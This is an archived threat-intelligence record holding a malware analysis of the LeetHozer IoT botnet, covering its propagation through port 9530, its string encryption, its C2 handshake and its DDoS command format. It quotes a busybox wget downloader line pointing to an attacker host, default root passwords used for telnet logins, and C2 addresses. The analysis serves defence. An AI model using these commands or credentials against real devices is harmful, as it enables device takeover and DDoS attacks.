{
	"id": "fd421208-a309-401c-827a-42f248265206",
	"created_at": "2026-04-10T03:20:22.85902Z",
	"updated_at": "2026-04-10T13:11:51.016911Z",
	"deleted_at": null,
	"sha1_hash": "c823fb7b976a6131af5dc7424483100e3fbb0c46",
	"title": "The LeetHozer botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 320365,
	"plain_text": "The LeetHozer botnet\r\nBy Alex.Turing\r\nPublished: 2020-04-27 · Archived: 2026-04-10 02:43:57 UTC\r\nBackground\r\nOn March 26, 2020, we captured a suspicious sample, 11c1be44041a8e8ba05be9df336f9231. Although the samples\r\nhave the word mirai in their names and most antivirus engines identified them as Mirai, the network traffic is entirely\r\nnew, which got our attention.\r\nThe sample borrows some of Mirai’s Reporter and Loader mechanisms, but the encryption method, the Bot\r\nprogram and the C2 communication protocol have been completely redesigned.\r\nRegular Mirai variants normally make fairly minor changes, such as changing C2s or encryption keys or\r\nintegrating some new vulnerabilities, nothing dramatic.\r\nBut this one is different. Its encryption method is unique, and its communication protocol is more rigorous. It is also\r\nvery likely a new branch from the Moobot group and is in active development. (The author released a third version\r\nwhile we were working on this article, adding some new functions and changing the Tor C2 to vbrxmrhrjnnouvjf.onion:31337.)\r\nSo we decided to blog about it, and we named it LeetHozer because of the H0z3r string ( /bin/busybox wget\r\nhttp://37[.49.226.171:80/bins/mirai.m68k -O - \u003e H0z3r; ).\r\nThe target devices currently observed are mainly XiongMai H.264 and H.265 devices.\r\nPropagation\r\nIn 2017, security researchers disclosed the vulnerability[2].\r\n2020-02-04 A PoC was released on GitHub[3][4].\r\n2020-02-11 We saw a moobot variant, which we called moobot_xor, exploiting this vulnerability.\r\n2020-03-26 LeetHozer began to exploit the vulnerability.\r\nLeetHozer exploits the vulnerability through the target device's TCP port 9530 to start the telnetd\r\nservice, then logs in to the device with the default password to complete the infection process. 
The propagation process is shown in the figure:\r\nThe number of source IPs currently exploiting the vulnerability is around 4.5k per day.\r\nLeetHozer and moobot_xor used the same unique string /bin/busybox DNXXXFF in their 9530 exploit. We also\r\nobserved that at times they used the exact same downloader, so we speculate that moobot_xor and LeetHozer\r\nprobably belong to the same organization or individual.\r\nThe time periods and the downloader shared by the two families are as follows:\r\ndate=2020-03-26 08:11:46+08:00 md5=11c1be44041a8e8ba05be9df336f9231 family_name=LeetHozer url=http://185\r\ndate=2020-03-26 08:11:39+08:00 md5=11c1be44041a8e8ba05be9df336f9231 family_name=LeetHozer url=http://185.1\r\ndate=2020-03-26 08:11:39+08:00 md5=b7b2ae292bf182b0d91535770394ad93 family_name=moobot_xor url=http://185.1\r\nThe recent LeetHozer DDoS targets we currently see\r\nReverse analysis\r\nAt present, there are three versions of LeetHozer samples (we are going to focus on V2, as V3 is in development\r\nnow). 
The difference between V1 and V2 is mainly that V2 supports more DDoS attack methods.\r\nWe are going to take a quick look at the sample’s behavior, DDoS command format and network communication\r\nbelow.\r\nMD5: 57212f7e253ecebd39ce5a8a6bd5d2df\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nPacker: None\r\nLibrary: uclibc\r\nVersion: V2\r\nSample behavior\r\nThe functionality of LeetHozer is relatively simple. When it runs on an infected device, it operates the watchdog\r\ndevice, then writes its PID to a file named .1 and prints the string /bin/sh:./a.out:not found to the console\r\n(to confuse the user?). After that, it starts to scan the internet for more devices with port 9530 open and tries to use\r\nthe vulnerability to start the telnetd service on more victim devices.\r\nThe sample also reports the infected device information to the reporter and establishes communication with the C2,\r\nwaiting for instructions to launch a DDoS attack.\r\nThe sample uses a custom algorithm for encryption. The decryption algorithm is as follows:\r\nxorkey = \"qE6MGAbI\"\r\n\r\ndef decode_str(ctxt):\r\n    # One XOR pass per key byte; each pass XORs position idx with (key byte + idx).\r\n    for i in range(0, len(xorkey)):\r\n        plain = \"\"\r\n        size = len(ctxt)\r\n        for idx in range(0, size):\r\n            ch = ord(ctxt[idx])\r\n            ch ^= (ord(xorkey[i]) + idx)\r\n            plain += chr(ch)\r\n        # The output of this pass is the input of the next one.\r\n        ctxt = plain\r\n    return ctxt\r\nAfter decryption, the key information is as follows, including the watchdog devices and the C2 to be operated by the Bot.\r\nThe information is decrypted only when the bot needs it.\r\n.1 /dev/watchdog\r\n/dev/misc/watchdog /bin/sh: ./a.out: not found\r\nw6gr2jqz3eag4ksi.onion\r\nThe specific implementation of the Bot function is as follows:\r\n1. Set watchdog to prevent device restart\r\n2. Bot singleton through PID file\r\n3. 
Scan, exploitation and report information\r\nMirai's fast port scan technique has been borrowed; the scanned port is 9530.\r\nUse the vulnerability to enable the telnetd service and try to log in with the following credentials.\r\nroot:xc3511\r\nroot:xmhdipc\r\nroot:klv123\r\nroot:123456\r\nroot:jvbzd\r\nroot:hi3518\r\nroot:tsgoingon\r\nReport device information after successful login\r\n4. Receive the C2 command and prepare for DDoS attack. The attack commands supported by different\r\nversions are different.\r\nversion command\r\nV1 tcpraw\r\nV2 tcpraw;icmpecho;udpplain\r\nHowever, the data format of the attack command is the same. Its structure is Header(6\r\nbytes),Option1,Option2..., in which the structure of Option is Type(2 bytes),Len(2 bytes),Subtype(2\r\nbytes),Contents(Len bytes),Padding. The following takes an actual attack command as an example to\r\nexplain the parsing process.\r\n00000000: 3E 00 3F 00 3A 00 01 00 08 00 04 00 75 64 70 70 \u003e.?.:.......udpp\r\n00000010: 6C 61 69 6E 00 00 00 00 01 00 0E 00 06 00 31 33 lain..........13\r\n00000020: 39 2E 32 38 2E 32 31 38 2E 31 38 30 00 00 00 00 9.28.218.180....\r\n00000030: 02 00 01 00 0C 00 50 00 02 00 01 00 05 00 64 00 ......P.......d.\r\n----------------------------------------------------------------------------\r\nHeader: 3E 00 3F 00 3A 00, ----Little endian\r\n0x003E ---- xor key\r\n0x003A ---- 0x3A xor 0x3E = 4 Options\r\nOpt 1: 01 00 08 00 04 00, ----Little endian\r\n0x0001 ----Type 1, Padding 4 bytes\r\n0x0008 ----Content length, len(\"udpplain\") = 8\r\n0x0004 ----Subtype 4, Contents is the attack vector\r\nContents: udpplain\r\nPadding: 00 00 00 00\r\nOpt 2: 01 00 0E 00 06 00, ----Little endian\r\n0x0001 ----Type 1, Padding 4 bytes\r\n0x000e ----Content length\r\n0x0006 ----Subtype 6, Contents is the attack target\r\nContents: 139.28.218.180\r\nPadding: 00 00 00 00\r\nOpt 3: 02 00 01 00 0c 00, ----Little endian\r\n0x0002 ----Type 2, No Padding\r\n0x0001 ----Type 2 Ignore this field, Contents length is al\r\n0x000c ----Subtype 0xc, Contents is the target port\r\nContents: 80\r\nOpt 4: 02 00 01 00 05 00, ----Little endian\r\n0x0002 ----Type 2, No Padding\r\n0x0001 ----Type 2 Ignore this field, Contents length is al\r\n0x0005 ----Subtype 0x05, Contents is attack duration\r\nContents: 0x0064\r\nCommunication protocols\r\nTwo types of C2 have been used: Tor-C2 and IP-C2. Both exist in the V2 version, but the code branch where\r\nTor-C2 is located will not be executed. It is likely the V2 version is not final yet.\r\n1. Tor-C2, supported by V1, not used in V2.\r\nw6gr2jqz3eag4ksi.onion:31337\r\n2. IP-C2, supported by V2.\r\n37.49.226.171:31337\r\nTor-C2 has a preliminary step to establish a connection through a Tor proxy. After the connection between Bot and C2 is\r\nestablished, it takes two rounds of interaction for the bot to successfully go online.\r\nEstablish a connection with C2 through Tor proxy\r\nThe hardcoded proxy list:\r\nFirst round of interaction\r\nThe packet sent by the Bot is 255 bytes long; the first 32 bytes are valid data, and the data is interpreted\r\nas little-endian.\r\nThe meaning of some key fields\r\noffset length content field meaning\r\n0x00 2 bytes 0x8f49 source port\r\n0x02 2 bytes 0x7a69 hardcode\r\n0x04 4 bytes 0x00004818 hardcode\r\n0x0e 2 bytes 0x0001 first round\r\n0x14 4 bytes 0x0051cc checksum\r\nThe checksum is calculated as follows\r\nstep 1: calculate the sum of the first 12 WORDs\r\n(0x8f49+0x7a69+0x4818+0x0000+0x0000+0x0000\r\n+0x0001+0x0000+0x0000+0x0000+0x0000+0x0000) = 0x000151CB;\r\nstep 2: (HWORD(sum) + LWORD(sum)) \u003e\u003e 16\r\n(0x0001+0x51CB) \u003e\u003e 16 = 0;\r\nstep 3: (HWORD(sum) + LWORD(sum)) \u0026 0xffff\r\n(0x0001+0x51cb) \u0026 0xffff = 0x000051cc\r\nThe first 32 bytes of the C2 reply packet are valid data. The packet length is 255 bytes, interpreted as little-endian. The Bot checks the two valid flags. When the check passes, part of the data is used for\r\nthe second round of interaction.\r\noffset length content field meaning\r\n0x04 4 bytes 0x000070f1 valid flag1\r\n0x08 4 bytes 0x00004819 valid flag2\r\nSecond round of interaction\r\nThe packet sent by the Bot is 255 bytes long; the first 32 bytes are valid data, and the data is interpreted\r\nas little-endian. Most of the data comes from the C2 reply packet of the previous step.\r\noffset length content field meaning\r\n0x00 8 bytes 0x7a697a69,0x000070f1 C2 reply in round 1\r\n0x08 4 bytes 0x000070f2 hardcode\r\n0x0e 2 bytes 0x0002 second round\r\n0x14 4 bytes 0x00d665 checksum\r\nThe first 32 bytes of the C2 reply packet are valid data. The packet length is 255 bytes, interpreted as little-endian. The Bot checks two valid flags. When the check passes, the Bot's online process is\r\ncompleted.\r\noffset length content field meaning\r\n0x04 4 bytes 0x00002775 valid flag1\r\n0x08 4 bytes 0x000070f2 valid flag2\r\nAt this point, the identity verification between the Bot and C2 is completed, and the Bot starts to wait for the C2 to\r\nissue instructions. 
The first byte of the C2 reply packet specifies the type of instruction.\r\nInstruction code: 0x00 indicates heartbeat\r\nInstruction code: 0x01 indicates reporting Bot group information\r\nInstruction code: anything other than 0x00 or 0x01 indicates a DDoS attack.\r\nReaders are always welcome to reach us on Twitter or by email at netlab at 360 dot cn.\r\nIoC list\r\nC2\r\nvbrxmrhrjnnouvjf.onion:31337 #v3\r\n37.49.226.171:31337 #v2\r\nw6gr2jqz3eag4ksi.onion:31337 #v1\r\nMD5\r\nDownloader\r\nIP\r\n185.172.110.224 Netherlands ASN206898 Server_Hosting_Pty_Ltd\r\n185.225.19.57 Romania ASN39798 MivoCloud_SRL\r\n37.49.226.171 Netherlands ASN208666 Estro_Web_Services_Private_Limited\r\n64.225.64.58 Netherlands ASN14061 DigitalOcean,_LLC\r\n188.214.30.178 Romania ASN51177 THC_Projects_SRL\r\n190.115.18.144 Russian ASN262254 DANCOM_LTD\r\nSource: https://blog.netlab.360.com/the-leethozer-botnet-en/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/the-leethozer-botnet-en/"
	],
	"report_names": [
		"the-leethozer-botnet-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775791222,
	"ts_updated_at": 1775826711,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c823fb7b976a6131af5dc7424483100e3fbb0c46.pdf",
		"text": "https://archive.orkl.eu/c823fb7b976a6131af5dc7424483100e3fbb0c46.txt",
		"img": "https://archive.orkl.eu/c823fb7b976a6131af5dc7424483100e3fbb0c46.jpg"
	}
}